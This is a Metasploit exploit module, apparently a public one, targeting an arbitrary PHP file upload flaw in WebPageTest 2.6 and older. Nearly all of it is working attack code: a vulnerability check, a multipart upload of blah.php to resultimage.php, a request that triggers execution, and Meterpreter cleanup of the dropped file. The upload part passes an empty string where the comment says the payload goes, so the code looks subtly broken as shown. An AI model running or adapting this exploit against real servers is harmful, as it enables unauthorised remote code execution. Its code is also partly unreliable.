## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info={}) super(update_info(info, 'Name' => "WebPageTest Arbitrary PHP File Upload", 'Description' => %q{ This module exploits a vulnerability found in WebPageTest's Upload Feature. By default, the resultimage.php file does not verify the user-supplied item before saving it to disk, and then places this item in the web directory accessable by remote users. This flaw can be abused to gain remote code execution. }, 'License' => MSF_LICENSE, 'Author' => [ 'dun', #Discovery, PoC 'sinn3r' #Metasploit ], 'References' => [ ['OSVDB', '83822'], ['EDB', '19790'] ], 'Payload' => { 'BadChars' => "\x00" }, 'DefaultOptions' => { 'EXITFUNC' => 'thread' }, 'Platform' => ['php'], 'Arch' => ARCH_PHP, 'Targets' => [ ['WebPageTest v2.6 or older', {}] ], 'Privileged' => false, 'DisclosureDate' => "Jul 13 2012", 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [true, 'The base path to WebPageTest', '/www/']) ], self.class) end def check peer = "#{rhost}:#{rport}" uri = normalize_uri(target_uri.path) uri << '/' if uri[-1,1] != '/' base = File.dirname("#{uri}.") res1 = send_request_raw({'uri'=>normalize_uri("#{base}/index.php")}) res2 = send_request_raw({'uri'=>normalize_uri("#{base}/work/resultimage.php")}) if res1 and res1.body =~ /WebPagetest \- Website Performance and Optimization Test/ and res2 and res2.code == 200 return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe end def on_new_session(cli) if cli.type != "meterpreter" print_error("No automatic cleanup for you. Please manually remove: #{@target_path}") return end cli.core.use("stdapi") if not cli.ext.aliases.include?("stdapi") begin print_warning("Deleting: #{@target_path}") cli.fs.file.rm(@target_path) print_good("#{@target_path} removed") rescue print_error("Unable to delete: #{@target_path}") end end def exploit peer = "#{rhost}:#{rport}" uri = normalize_uri(target_uri.path) uri << '/' if uri[-1,1] != '/' base = File.dirname("#{uri}.") p = payload.encoded fname = "blah.php" data = Rex::MIME::Message.new data.add_part( "", #Data is our payload 'multipart/form-data', #Content Type nil, #Transfer Encoding "form-data; name=\"file\"; filename=\"#{fname}\"" #Content Disposition ) print_status("Uploading payload (#{p.length.to_s} bytes)...") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri("#{base}/work/resultimage.php"), 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => data.to_s }) if not res print_error("No response from host") return end @target_path = normalize_uri("#{base}/results/#{fname}") print_status("Requesting #{@target_path}") res = send_request_cgi({'uri'=>@target_path}) handler if res and res.code == 404 print_error("Payload failed to upload") end end end